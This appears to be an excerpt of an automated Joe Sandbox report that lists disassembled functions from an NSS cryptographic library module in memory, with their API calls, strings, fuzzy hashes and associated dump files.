Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
String ID: exporter
API String ID: 712147604-111224270
Opcode ID: 36664d2bad7da73778252b9070ffd88459fba56bf1b6943fd8aba576bdd777c0
Instruction ID: 3afb7ca20354c942c70229133cd2cfa5f3c36ca620c11ff89cecf2abb985a7e5
Opcode Fuzzy Hash: 36664d2bad7da73778252b9070ffd88459fba56bf1b6943fd8aba576bdd777c0
Instruction Fuzzy Hash: 64610671A007899BEF218FA8CE05BEE77B6BF4430CF14493CE91A5AA52EB31D954C741

Function 6C7D4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C7D536F,00000022,?,?,00000000,?), ref: 6C7D4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C7D4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C7D4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C7D4FAE
free.MOZGLUE(?), ref: 6C7D4FC8

Strings

%s=%s, xrefs: 6C7D4F89
%s=%c%s%c, xrefs: 6C7D4FA9
oS}l", xrefs: 6C7D4DFB, 6C7D4EF4, 6C7D4EC5

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oS}l"
API String ID: 2709355791-2082417239
Opcode ID: 1708a27c433e4ffd1b9bf3772f7a60c1dfe36fca9905f5aa5e7361a670198eec
Instruction ID: 4c075b2ee2c6c030f809ccb0de39babeef9d102d3f3a05f5ac963ebc35c73851
Opcode Fuzzy Hash: 1708a27c433e4ffd1b9bf3772f7a60c1dfe36fca9905f5aa5e7361a670198eec
Instruction Fuzzy Hash: 3D515971A04146ABEF01CB69C6907FF7BF99F42308F1E8136E894A7A41D325A8059792

Function 6C7FEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FEF6D

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

htonl.WSOCK32(00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FEFE4
htonl.WSOCK32(?,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FEFF1
memcpy.VCRUNTIME140(?,?,6C81A4A1,?,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FF00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FF027

Strings

dtls13, xrefs: 6C7FEF33

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: eb107c6c2fcd318995edff95dfa7555f3a6df9f61ad2ab2da428ae857d14265e
Instruction ID: 9df5b4555425a5dcc8939ababdb9b03bcbe838fc916e1e6a3c10734e1f948f38
Opcode Fuzzy Hash: eb107c6c2fcd318995edff95dfa7555f3a6df9f61ad2ab2da428ae857d14265e
Instruction Fuzzy Hash: 58310671A01215AFD710DF28DE80B9AB7E4EF49348F158439E8289B751E731E916CBE1

Function 6C77AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C77AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C899500,6C773F91), ref: 6C77AFD2

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

DER_GetInteger_Util.NSS3(?), ref: 6C77B007

Part of subcall function 6C7C6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C771666,?,6C77B00C,?), ref: 6C7C6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C77B02F
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C77B046
PL_FreeArenaPool.NSS3 ref: 6C77B058
PL_FinishArenaPool.NSS3 ref: 6C77B060

Strings

security, xrefs: 6C77AFB8

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: b004f437ae6a2d62fed60de5a2c0eebe1b1b280373cf6219796c2ad56377a6a8
Instruction ID: 238b97ef3bb303d8200b70d86b543278bf3127edb217e8dd7074b7bf8587aaa5
Opcode Fuzzy Hash: b004f437ae6a2d62fed60de5a2c0eebe1b1b280373cf6219796c2ad56377a6a8
Instruction Fuzzy Hash: 4D313A705043049BDF308F149E4CBAA77A4AF4632CF100A68E8759BBC1E332A609C7A7

Function 6C773E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 6C7740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C773F7F,?,00000055,?,?,6C771666,?,?), ref: 6C7740D9
Part of subcall function 6C7740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C771666,?,?), ref: 6C7740FC
Part of subcall function 6C7740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C771666,?,?), ref: 6C774138

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C773EC2
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C773ED6

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C773EEE

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C773F02
PL_FreeArenaPool.NSS3 ref: 6C773F14
PL_FinishArenaPool.NSS3 ref: 6C773F1C

Part of subcall function 6C7D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C7D127C,00000000,00000000,00000000), ref: 6C7D650E

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C773F27

Strings

security, xrefs: 6C773EBC

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
String ID: security
API String ID: 1076417423-3315324353
Opcode ID: abbfb522ab5d30d41d81d862fe90468d491777fe0c87e06039ab2f187c4cb659
Instruction ID: 9c57b2dc92d3a6e89f1552ab230c928b1017450f8eaccabe443cdd955b74d982
Opcode Fuzzy Hash: abbfb522ab5d30d41d81d862fe90468d491777fe0c87e06039ab2f187c4cb659
Instruction Fuzzy Hash: 94213AB2A04304ABD7248B15AD09FAB77A8FB4435CF04093DF959A7741E730E618C79A

Function 6C7BCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C7BCD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C7BCE16
PR_SetError.NSS3(00000000,00000000), ref: 6C7BD079

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 00d869b5061ca9b2ac6766d60c915f68d813d172a10e0d3eb9f0be496ff92662
Instruction ID: ae664c8bb7a760bb95369826bac31f384a73ad3332623e64857179559dfb8aaf
Opcode Fuzzy Hash: 00d869b5061ca9b2ac6766d60c915f68d813d172a10e0d3eb9f0be496ff92662
Instruction Fuzzy Hash: F8C18DB5A002199FDB20CF24CD85BDAB7B4BF48318F1481A8E948A7741E775EE95CF90

Function 6C7ADC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C7B97C1,?,00000000,00000000,?,?,?,00000000,?,6C797F4A,00000000), ref: 6C7ADC68

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7ADD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7ADE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7ADE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7ADE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7ADF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7ADF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7ADF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7ADFAA

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 7cb2e33aec471f306bbe1e5cf7097610519e546e822bb06b0323f29766b3d8ed
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: 4A81D67160E6008BFF104BD9CA9435A72DADB74348F20863EDD5ACAFE1E774D486C60A

Function 6C783C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C783C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6C783C94

Part of subcall function 6C7795B0: TlsGetValue.KERNEL32(00000000,?,6C7900D2,00000000), ref: 6C7795D2
Part of subcall function 6C7795B0: EnterCriticalSection.KERNEL32(?,?,?,6C7900D2,00000000), ref: 6C7795E7
Part of subcall function 6C7795B0: PR_Unlock.NSS3(?,?,?,?,6C7900D2,00000000), ref: 6C779605

PORT_NewArena_Util.NSS3(00000800), ref: 6C783CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C783CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C783CE1

Part of subcall function 6C783090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C79AE42), ref: 6C7830AA
Part of subcall function 6C783090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7830C7
Part of subcall function 6C783090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7830E5
Part of subcall function 6C783090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C783116
Part of subcall function 6C783090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C78312B
Part of subcall function 6C783090: PK11_DestroyObject.NSS3(?,?), ref: 6C783154
Part of subcall function 6C783090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C78317E

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: 542933eb136081fb1de5563cbdc52661ad3c0cf7254915db7ca60c646cd51bad
Instruction ID: a006be6a10f51ee0347b44260d20c6b464c55545cee53eacf17ba655bd936daa
Opcode Fuzzy Hash: 542933eb136081fb1de5563cbdc52661ad3c0cf7254915db7ca60c646cd51bad
Instruction Fuzzy Hash: 4461E6B1A01200ABEF105E69DE49FA776B9EF04748F084478FE09AAA52F731D914C7B1

Function 6C7C3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6C7C3440: PK11_GetAllTokens.NSS3 ref: 6C7C3481
Part of subcall function 6C7C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C7C34A3
Part of subcall function 6C7C3440: TlsGetValue.KERNEL32 ref: 6C7C352E
Part of subcall function 6C7C3440: EnterCriticalSection.KERNEL32(?), ref: 6C7C3542
Part of subcall function 6C7C3440: PR_Unlock.NSS3(?), ref: 6C7C355B

TlsGetValue.KERNEL32 ref: 6C7C3D8B
EnterCriticalSection.KERNEL32(?), ref: 6C7C3D9F
PR_Unlock.NSS3(?), ref: 6C7C3DCA
PR_SetError.NSS3(00000000,00000000), ref: 6C7C3DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C7C3E4F

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

TlsGetValue.KERNEL32 ref: 6C7C3E97
EnterCriticalSection.KERNEL32(?), ref: 6C7C3EAB
PR_Unlock.NSS3(?), ref: 6C7C3ED6
PR_SetError.NSS3(00000000,00000000), ref: 6C7C3EEE

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: de9612c5568c411143af158dfdbecd0aec6d1e5595ae0cc6666c19434a0b890b
Instruction ID: f62845689d71a7eb92bd84e459619949be758823d72fc737dd12f4d21519b17b
Opcode Fuzzy Hash: de9612c5568c411143af158dfdbecd0aec6d1e5595ae0cc6666c19434a0b890b
Instruction Fuzzy Hash: 4A515775B006029FDB21AF69DE44BA673B8AF4531CF050578DE094BA12EB31E944C7C2

Function 6C772C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(00335406), ref: 6C772C5D

Part of subcall function 6C7D0D30: calloc.MOZGLUE ref: 6C7D0D50
Part of subcall function 6C7D0D30: TlsGetValue.KERNEL32 ref: 6C7D0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C772C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C772CE0

Part of subcall function 6C772E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C772CDA,?,00000000), ref: 6C772E1E
Part of subcall function 6C772E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C772E33
Part of subcall function 6C772E00: TlsGetValue.KERNEL32 ref: 6C772E4E
Part of subcall function 6C772E00: EnterCriticalSection.KERNEL32(?), ref: 6C772E5E
Part of subcall function 6C772E00: PL_HashTableLookup.NSS3(?), ref: 6C772E71
Part of subcall function 6C772E00: PL_HashTableRemove.NSS3(?), ref: 6C772E84
Part of subcall function 6C772E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C772E96
Part of subcall function 6C772E00: PR_Unlock.NSS3 ref: 6C772EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C772D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C772D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C772D3F
free.MOZGLUE(00000000), ref: 6C772D73
CERT_DestroyCertificate.NSS3(?), ref: 6C772DB8
free.MOZGLUE ref: 6C772DC8

Part of subcall function 6C773E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C773EC2
Part of subcall function 6C773E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C773ED6
Part of subcall function 6C773E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C773EEE
Part of subcall function 6C773E60: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C773F02
Part of subcall function 6C773E60: PL_FreeArenaPool.NSS3 ref: 6C773F14
Part of subcall function 6C773E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C773F27

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: c36c021531d7af97ebffe897e6f3a4cc4012e90828de995afd3167026f36e81a
Instruction ID: cdc0e03a429952cc83e0fecc831cab13dc491632f540fd8492627873f48fb8fe
Opcode Fuzzy Hash: c36c021531d7af97ebffe897e6f3a4cc4012e90828de995afd3167026f36e81a
Instruction Fuzzy Hash: 5F51D071A04219DBDF209F29CE4AB6B77E5EF94308F140438EC6583650E731E815CBA2

Function 6C798F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C799013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C799042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C79905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C799073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C7990EC

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C799111

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: 9b3f4165ac404acdeaebde3b18a639ad97565ea33329adf2efc9118802add079
Instruction ID: a0071b91769593d7f384c70c3dc261745d0621799e88d77ec053b4499a0570e2
Opcode Fuzzy Hash: 9b3f4165ac404acdeaebde3b18a639ad97565ea33329adf2efc9118802add079
Instruction Fuzzy Hash: 79518974A046158FDF10EF38D688299BBF1BF4A318F055579DC499BB06EB35E884CB81

Function 6C777CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C773F7F,?,00000055,?,?,6C771666,?,?), ref: 6C7740D9
Part of subcall function 6C7740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C771666,?,?), ref: 6C7740FC
Part of subcall function 6C7740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C771666,?,?), ref: 6C774138

PR_GetCurrentThread.NSS3 ref: 6C777CFD

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6C899030), ref: 6C777D1B

Part of subcall function 6C7CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C771A3E,00000048,00000054), ref: 6C7CFD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6C899048), ref: 6C777D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C777D50
PR_GetCurrentThread.NSS3 ref: 6C777D61
PORT_ArenaMark_Util.NSS3(?), ref: 6C777D7D
